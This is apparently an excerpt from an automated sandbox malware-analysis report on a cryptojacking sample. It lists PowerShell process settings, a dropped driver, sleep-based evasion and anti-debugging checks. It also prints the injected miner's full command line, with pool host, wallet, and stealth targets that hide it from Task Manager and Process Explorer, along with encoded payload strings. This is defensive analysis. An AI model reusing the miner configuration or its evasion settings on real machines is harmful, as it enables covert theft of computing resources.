        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5408C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001A.00000002.3410809736.0000010D5407D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D53FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CONHOST.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:3333--USER=4AGH8ZKEBTMI6NAKN8KYTBECUAWOWBAJKJ6VEDXZMSIPJTKYWTF1HHADAFJN39JTRSXIPBHSSZQNT2U1JYCPSAEDMHFT2QQ--PASS=--CPU-MAX-THREADS-HINT=80--CINIT-WINRING=GTEBVDARARZG.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-VERSION=3.4.0--CINIT-ID=URMTBCJNGPPIBWNAXX
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D53FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
        Source: conhost.exe, 0000001A.00000003.2251425628.0000010D54012000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEURMTBCJNGPPIBWNA
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D53FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=POOL.HASHVAULT.PRO:3333 --USER="4AGH8ZKEBTMI6NAKN8KYTBECUAWOWBAJKJ6VEDXZMSIPJTKYWTF1HHADAFJN39JTRSXIPBHSSZQNT2U1JYCPSAEDMHFT2QQ" --PASS="" --CPU-MAX-THREADS-HINT=80 --CINIT-WINRING="GTEBVDARARZG.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-VERSION="3.4.0" --CINIT-ID="URMTBCJNGPPIBWNA"
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5407D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEIZ.EXEXEDE2EP.
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5408C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001A.00000003.2251425628.0000010D54012000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001A.00000002.3410809736.0000010D53FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5408C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEERYSYSTEMB7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4196Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5583Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7127
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2430
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeDropped PE file which has not been started: C:\Windows\Temp\gtebvdararzg.sysJump to dropped file
        Source: C:\Windows\System32\conhost.exeAPI coverage: 1.1 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 4196 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 5583 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656Thread sleep count: 7127 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep count: 2430 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4200Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D54011000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^|
        Source: nlkuzmdacjrb.exeBinary or memory string: dw/NyAnZto7sTE0PC19LNmoMCo/IMEsHOcwIjw2eXWeaT83ICeAwrYFMTQ8LYjIM+YwKj8gFddesTAiPDaMNwFGPzcgJ2N3UWMxNDwtc03BpDAqPyBxyUX/MCI8Nmk1V0g/NyAnNZd22jE0PC1v7Z7UMCo/IIC0TMQwIjw2ylrIJT83ICcpcIQoMTQ8LYvsaR8wKj8gPCWJgjAiPDZBEiB1PzcgJw+PmtwxNDwty+UpwjAqPyAkiLRVMCI8NpEPxHo/N
        Source: nlkuzmdacjrb.exeBinary or memory string: DXr5DnNicQ0Ec5malpu5zj0X1cvE43PZQVmr+Y0aN0ft2M7lPDmFUFJIXRzLkY6Jm4V1llJM586s9oD9P+ACx62WRYlR2yYIwOXmh4j8ibvat4+QtJzsyFE1vQYkklZjbsPkgqDRfnTYKAmSa1F/qxtOjJDb6w0AuXWRsTXS82WGeWyL5FrlFm+8zJqV9/vmciF0RRev2X6uUmS8XHYUc3auyRX0DizG7BoZNwmULhPrhY+QlCCr1EvX6GEB6FN5j3Ps
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D54011000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001A.00000002.3410809736.0000010D53FC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: nlkuzmdacjrb.exeBinary or memory string: gBVmcIECxFTTQIjQqoF2lMU0JiXFlBJemetRIKRQFAdxJ2MpfnE0GABAIFWFFsZgQezILBH34a4gANRKB51whPOei4aVoPHR7qVYkAAlsZi+dvcqI5EsWaPbc/umhCBlzY9hprahI5C+Fd1jo39EjJxPggKAPWXb+53XwRhRAZ3hOGPjlzFTuUedjOxUtTBO7Htez6OXG65IO6+V88sCWRAxEcvRIaWn649EPHOUlGduRobFQWuf9oKWsApQwVEox1ZS
        Source: nlkuzmdacjrb.exeBinary or memory string: Vw1TTdePl29GWBqhXRibu38oMDy4VPT33r+uJFm60pEmXFD2RMjflMGYhXxbr6hcWaZryIuD2/FYNcYTeCgIZ4NYOZjZUqnm3DiT9pgIgIzJe70K0jmivpPSCkc+3VGcpS26KN9HAs5Jg3xbkw+Xjk4iuYhd/Xo1mcE7NKlKsFB9S6RU3qyL4myykwN0bVMcIY8bsnOiHMIbuvqmV2hZvsMsIdxPdRwzllBR/xSa4oFfCdu4Sa1Wzq6uH0Z63KVFPNnv
        Source: nlkuzmdacjrb.exeBinary or memory string: c42tl3IVq/2ixssW88Mk6qSa/+F30gSq8nrFvh0n4Hbj1e435d6Vg1YgX7QvxZoTeXXodtE4yL9kqMLjKI5iO08R5JDA9iA91eKKbKXB6fqKxZTe6Y6tt46ApVTV2p7ChTzLRRV7EkwxJ0iCRj+jxgGGbWWOR7ybpygfCmlyWf5EeNa3Wpq/8D2/3ro8ePRLmCpnHBQEmUvK7YpIZkkoYOpxgIsLVWC3Ni4kE+ATwdByTfHsG4ulC8i4MsUxXDDWbi14
        Source: nlkuzmdacjrb.exeBinary or memory string: NBR99Hfl3iMD9+3Rc/bJSWd4Z8JA7RdGaE50JWEhjjRwHGFS/J7MbYbgH+pEeSlJZ6ceK/c8D731xIvaZ0FmY2VwcHV4C4m+O88puFz4/0cS1rZrxpGsz27cv+ByCNTo8JmpZk474PJ4uJm4V5DLmqDr02fn2BeLVnRUVBKLli2bFSLzTHdzigFImbPPvb/zm3nUt1/5avHSc5Q2q9E4ucjInA+P18eDuAIFF+G6jIvlFhYFpoy1Q1n5H9iJGfhfRfyZ
        Source: nlkuzmdacjrb.exeBinary or memory string: H+VwYNik2ZKkZJm4HpoMyZ0JJZnEBTq2Mk+rmbS3+c1lgJCSaKIp0PXoOXklnHTNlEt07R5ZuljUpKPeHt7cXOmlqQaAn5g8c6kZZlraU02oMePUfE/WlfkFoE4qgyiZwUSLcOSIu2BBgFFnRHgfstrlFNES2dIFLYeJDAEXKLGscJn3jSHjOOwzw5Y6gXrZPw/xmVs2XLgvvIWR5o+kvQ1BMocCtbimDMk6TdwctYhDbeCBrKGQ+dXngZxdBExkVefD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72878D6F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72878D6F0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72877F4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,0_2_00007FF72877F4E0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001BB8028FE28 mov eax, dword ptr fs:[00000030h]0_2_000001BB8028FE28
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00000122A433FE28 mov eax, dword ptr fs:[00000030h]18_2_00000122A433FE28
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72877D480 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF72877D480
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
